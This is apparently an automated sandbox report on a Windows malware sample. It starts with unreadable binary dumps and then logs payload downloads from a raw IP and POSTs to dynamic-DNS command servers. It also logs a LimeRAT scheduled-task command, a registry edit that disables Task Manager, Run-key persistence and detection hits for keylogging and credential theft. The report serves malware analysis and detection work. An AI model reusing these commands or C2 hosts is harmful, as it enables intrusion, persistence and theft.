Data received	E;Ð\|;ËwMUëMUÁ[]ÂSUVWñ3Ûè)üÿÿøÿt9l$ýt ¾Ü!t'CöÃuèº9®Ü!tÎè"áÿÿÎèðûÿÿøÿuË3À_^][ÂÇëõSVWñ3Ûë<¾Ü!t>CöÃuèÌ¹¾Ü!uÿt$èEPèÎáYYÀtÎèÅàÿÿÎèûÿÿøÿu¹3À_^[ÂÇëöVñè¦W9lu9lu9lu9ltFPj8èeÕÿÿj¹èËCè¸/^Ãÿt$APj"èúàÿÿj¹èËCè/ÂUììLEM´eôeøEüèÿÁå]Â¸p«CÃUìÿuÿuÿuÿuÿuèãÿÿÿÿpÿ0èòôÄÀyÈÿ]ÃD$Pjÿt$ÿt$ÿt$è»ÿÿÿÄÃL$èÂSUÙ½VWs{ë&=hD\|þrj@Wÿ3èý+õ;õsÖ_^][Ãì¼$ÀSUVø´$ÐWjY¼$ÇD$rón<ó¥²ô\|$LjYó¥0¹gæ jxöRQü÷h\$dL$(¹®g»L$0@ò«ÙL$\5Íà[D$D3íD$hD$<D$`D$D$XD$,D$TD$8D$PD$ D$Ll$l$Hl$DD$D$ÇD$$:õO¥\$@L$4¶CÁL$ÈD$(L$3Ît$4ÁÁÁ3ðD$(D$ÁÎt$4¶CÆt$ðD$4t$3ñL$(ÁÎÎ3ÁL$(ÁÈD$4D$L$ ¶CD$ÈD$0L$ 3Ï\|$ÁÁÁ3øD$0D$ÁÏ\|$¶CÇ\|$ øD$\|$ 3ùL$0ÁÏÏ3ÁL$0ÁÈD$D$¶CÃ\$8ØD$Ë3ÊT$@ÁÁÁ3ÐD$D$ÁÊ¶CÂØD$\$83ÙL$,ÁËÃ3ÐD$ÁÊT$@T$¶CD$<ÈD$$L$,3Íl$<ÁÁÁ3èD$$¶CT$,ÁÍÅÐD$$T$,3ÑL$ÁÊÂ3èD$$ÁÍl$<l$¶CD$ÈD$L$3ÊT$ÁÁÁ3ÐD$¶Cl$ÁÊÂèD$l$l$L3éL$ ÁÍÅ3ÐD$D$tD$ÁÊT$T$`¶CT$@ÂÈL$ 3ÎD$$t$ ÁÁÁ3ÐD$$D$ÁÊ¶CÂðD$$t$ t$P3ñL$8ÁÎÆ3ÐD$$D$xD$ÁÊT$@T$d¶CT$<ÂÈD$(L$83Ï\|$8ÁÁÁ3ÐD$(D$ÁÊ¶CÂøD$(\|$8\|$T3ùL$,ÁÏÇ3ÐD$(ÁÊT$<T$hT$D$l¶CD$4ÈD$0L$,3Ë\$4ÁÁÁ3ØD$0¶CT$,ÁËÃÐT$,T$X3ÑÁÊD$0Â3ØD$0D$pD$ÁËÀ\$4L$4\$\\$@D$=Püÿÿ$$Ð¬$l$Ht$\|¼$ôD,l3)3D,L)Åý rä_^][Ä¼ÂUìäðìxMVWôD$<( (hø)l$@)d$p(Efï«CHPp8fnÑfnÂfnÎfbÊfn÷fbðfbñfþôt$$pfþõfïÞ\|$,x(ûfrófr×L$Hfïû(ïT$ fþ-«CP(ÅfïD$@(àfnÏfrÐfrôfnÒfïàfbÊfnÆfnÙfbØfbÙfþÞt$p0fþÜfïû)\$P(ß\|$(x8frófr×T$fïßL$(Ó\|$4fþÕfpÛ(Ât$0fïÄfpâN(ÈfrÐfrñfïÈfpé9P(H fn×x<fnÆp4fnÊfbÊfnùfbøfbùfþ\|$Pfþý\|$8x,fïß@$(ÃfrÐfró\|$fïÃ\|$8fnL$(ð)D$Pfþô(ÆfnØfïÅfn×(àfbÊfrÐfrôfïàfnÆfbØ(D$PfbÙfþßfn\|$4fþÜfïÃ)\$`(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÖfrÐfrñfïÈfnÀfbøfpéfnL$ fbÊfbùfþ\|$`fþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfnT$fïàfnÇfnÉfbÊfnÚfbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnD$fbøfpé9fnL$,fbÊfbùfþ\|$PfnT$(fþýfïßfnL$$(ÃfbÊfrÐfrófïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(Èfn×frñfrÐfïÈfnD$fpéfnL$0fn\|$fbøfbÊfbùfþ\|$PfþýfnL$,fïßfnÖ(ÃfbÊfrÐfrófïÃfnÙ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$$fbØ(D$`fbÙfþßfnúfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÐfrÐfrñfïÈfnD$fbøfpé9fnL$(fbÊfbùfþ\|$PfnT$ fþýfnL$fïß(ÃfbÊfrÐfrófïÃfn\$4(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfþÜ)\$PfïÃfn\|$(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÆfbøfpéfnL$(fbÊfbùfþ\|$PfnT$4fþýfïßfnL$(ÃfbÊfrÐfrófïÃfnØ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$0fbØ(D$`fbÙfþßfn\|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(Èfn×frÐfrñfïÈfnD$ fpé9fnL$fbøfbÊfbùfþ\|$Pfþýfïß(ÃfrófrÐfïÃ
Data received	)D$`(ðfn\$fþôfnÑ(ÆfnÊfïÅfbÊ(àfrÐfrôfïàfnD$,fbØ(D$`fbÙfþßfnøfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÒfrÐfrñfïÈfnD$$fbøfpéfnL$fbÊfbùfþ\|$PfnL$fþýfïßfn×(ÃfbÊfrÐfrófïÃfn\$,(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$ fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfþÖ(ÂfïÄ(ÈfrÐfrñfïÈfn\|$4fnD$fbøfpé9fnL$fpâNfnT$(fbÊfbùfþ\|$PfpÛfþýfïßfnL$0(ÃfnÖfrÐfrófbÊfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnÁfbØ(D$`fbÙfþßfn\|$$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnD$,fbøfpéfnL$fbÊfnT$(fbùfþ\|$PfþýfnÊfïß(ÃfrófrÐfïÃfn\$0(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÊfbÙfþßfn\|$ fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$(ÈfrÐfrñfïÈfnÇfbøfpé9fnL$fbÊfbùfþ\|$PfnL$fþýfïßfnÐ(ÃfbÊfrÐfrófïÃfnÞ(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$4fbØ(D$`fbÙfþßfn\|$0fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$ (ÈfrñfrÐfïÈfnD$4fpéfnL$fbøfbÊfbùfþ\|$PfþýfnÒfïßfnÏ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnÆfbØ(D$`fbÙfþßfn\|$,fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÑfrÐfrñfïÈfnÀfbøfpé9fnL$fbÊfbùfþ\|$PfnT$fþýfïßfnL$((ÃfbÊfrófrÐfïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$$fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfnþfþÖfpÛ9(ÂfïÄfpâNfnT$((ÈfrÐfrñfïÈfnD$0fbøfpéfnL$fbÊfbùfþ\|$PfþýfnL$4fïßfnÐ(ÃfbÊfrÐfrófïÃfn\$(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$fbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâNfnT$$(ÈfrÐfrñfïÈfnÁfbøfpé9fnÏfbÊfbùfþ\|$Pfþýfïß(ÃfrófrÐfïÃ(ð)D$`fþô(ÆfïÅ(àfnL$ fn\$,frÐfrôfnÒfïàfbÊfnD$fbØ(D$`fbÙfþßfn\|$fþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛ9fþÖ(ÂfïÄfpâNfnT$,(ÈfrÐfrñfïÈfnD$fbøfpéfnL$4fbÊfbùfþ\|$PfþýfnÑfïßfnÈ(ÃfbÊfrÐfrófïÃfnß(ð)D$`fþô(ÆfïÅ(àfrÐfrôfïàfnD$(fbØ(D$`fbÙfþßfþÜfïÃ)\$P(ØfrÐfrófïØ(ÓfpÛfþÖ(ÂfïÄfpâN(ÈfnÒfrñfrÐfïÈfpé9fnD$fn\|$0fbøfnÎfbÊfbùfþ\|$PfnT$fþýfïßfnL$(ÃfbÊfrÐfrófïÃfn\$$
Data received	tibleDCDeleteDCDeleteObjectGetDeviceCapsSelectObjectStretchBltCreateDIBSectionGetObjectWGetOpenFileNameWGetSaveFileNameWCommDlgExtendedErrorOpenProcessTokenAdjustTokenPrivilegesSetFileSecurityWLookupPrivilegeValueWAllocateAndInitializeSidFreeSidCheckTokenMembershipRegCloseKeyRegCreateKeyExWRegOpenKeyExWRegQueryValueExWRegSetValueExWSHGetMallocSHGetPathFromIDListWSHBrowseForFolderWSHFileOperationWShellExecuteExWSHGetFileInfoWSHGetFolderLocationSHChangeNotifyCreateStreamOnHGlobalCoCreateInstanceCLSIDFromStringOleInitializeOleUninitializeSHAutoCompleteInitCommonControlsEx±[Øsfxrar.exe PT4\|°ÂÐÞò"4H\hv²ÂÔê.>Vjx¢²ÀÒèö(>P`n~¨¸Ìè0<J^t¨Êì8P\n¨¸ÈÖæô.DTdv ²Ìèø<hVF:(:J\l~®Êèú*DZnz²¾ÌÚäö(>HT`n¤´ÆÒäþ\| øÚºvj^GetLastErrorsSetLastErrorÀGetCurrentProcessÝDeviceIoControljSetFileTimeRCloseHandleCreateDirectoryWRemoveDirectoryWCreateFileWÖDeleteFileWCreateHardLinkWaGetShortPathNameWGetLongPathNameWcMoveFileWóGetFileTypedGetStdHandle%WriteFileÀReadFileWFlushFileBuffersSSetEndOfFilefSetFilePointeraSetFileAttributesWêGetFileAttributesW.FindClose9FindFirstFileWEFindNextFileW¤GetVersionExW¿GetCurrentDirectoryWûGetFullPathNameW\FoldStringWGetModuleFileNameWGetModuleHandleWNFindResourceWbFreeLibraryEGetProcAddressÁGetCurrentProcessIdExitProcessSetThreadExecutionState²Sleep?LoadLibraryWpGetSystemDirectoryWdCompareStringWAllocConsole_FreeConsoleAttachConsole$WriteConsoleWFGetProcessAffinityMaskµCreateThreadSetThreadPriorityâInitializeCriticalSectionîEnterCriticalSection9LeaveCriticalSectionÑDeleteCriticalSectionYSetEventResetEventþReleaseSemaphoreùWaitForSingleObjectCreateEventW®CreateSemaphoreWwGetSystemTime¾SystemTimeToTzSpecificLocalTimeÐTzSpecificLocalTimeToSystemTime½SystemTimeToFileTime$FileTimeToLocalFileTimeFLocalFileTimeToFileTime%FileTimeToSystemTimerGetCPInfoþIsDBCSLeadBytegMultiByteToWideCharWideCharToMultiByte³GlobalAllocGetTickCountTLockResource¾GlobalLockÅGlobalUnlockºGlobalFreeALoadResource±SizeofResourceMSetCurrentDirectoryWßGetExitCodeProcessGetLocalTimeWMapViewOfFileÖUnmapViewOfFileCreateFileMappingWyOpenFileMappingWGetCommandLineWWSetEnvironmentVariableWExpandEnvironment
Data received	StringsWGetTempPathW`MoveFileExWGetLocaleInfoWGetTimeFormatWÈGetDateFormatW3GetNumberFormatWKERNEL32.dll!GdipAllocíGdipFree6GdipCloneImageGdipDisposeImageQGdipCreateBitmapFromStreamRGdipCreateBitmapFromStreamICM_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dll±RaiseExceptionsGetSystemInfoïVirtualProtectñVirtualQuery=LoadLibraryExAIsProcessorFeaturePresentIsDebuggerPresentÓUnhandledExceptionFilter¥SetUnhandledExceptionFiltercGetStartupInfoW§QueryPerformanceCounterÅGetCurrentThreadIdyGetSystemTimeAsFileTimeçInitializeSListHeadÀTerminateProcessRtlUnwindêEncodePointerãInitializeCriticalSectionAndSpinCountÅTlsAllocÇTlsGetValueÈTlsSetValueÆTlsFree>LoadLibraryEx

Poweshell is sending data to a remote host (2 events)

Data sent	GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive
Data sent	GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 12, 2021, 10:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 12, 2021, 10:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 12, 2021, 10:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 12, 2021, 10:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 12, 2021, 10:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 96 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x000000000000023c process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000240 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000244 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x0000000000000248 process_name: pw.exe process_identifier: 5856		0	0
Process32NextW April 12, 2021, 10:33 a.m.	snapshot_handle: 0x000000000000024c process_name: pw.exe process_identifier: 5856		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000250 process_name: pw.exe process_identifier: 5856		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000254 process_name: netsh.exe process_identifier: 7080		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000258 process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000025c process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000260 process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000264 process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000268 process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000026c process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000270 process_name: conhost.exe process_identifier: 3196		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000022c process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000230 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000274 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000278 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000027c process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000280 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000284 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000029c process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002a4 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002a8 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002ac process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002b0 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002b4 process_name: pw.exe process_identifier: 5756		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002c0 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002c4 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002c8 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002cc process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002d0 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002d4 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002d8 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002dc process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002e0 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002e4 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002e8 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002ec process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002f0 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002f4 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002f8 process_name: pw.exe process_identifier: 2192		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x00000000000002fc process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000300 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000304 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000308 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x000000000000030c process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000310 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000314 process_name: svchost.exe process_identifier: 7848		0	0
Process32NextW April 12, 2021, 10:34 a.m.	snapshot_handle: 0x0000000000000318 process_name: conhost.exe process_identifier: 7556		0	0

Yara rule detected in process memory (50 out of 224 events)

description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat"
cmdline	wmic process where name='taskmgr.exe' delete
cmdline	wmic process where name='xmrig.exe' delete
cmdline	schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"
cmdline	wmic process where name='Taskmgr.exe' delete
cmdline	wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline	taskkill /F /IM xmrig.exe
cmdline	ping 127.0.0.1 -n 90
cmdline	ping 127.0.0.1 -n 5
cmdline	REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
cmdline	cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\1234.bat"

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	34.126.93.163

Wscript.exe initiated network communications indicative of a script based payload download (16 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.ddns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.ddnsking.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.3utilities.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.bounceme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.freedynamicdns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.freedynamicdns.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://muslada2251.ddns.net:16020/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://muslada2251.ddnsking.com:16020/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 12, 2021, 10:41 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
description	svchost.exe tried to sleep 8749219666 seconds, actually delayed analysis time by 8749219666 seconds

Installs itself for autorun at Windows startup (26 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
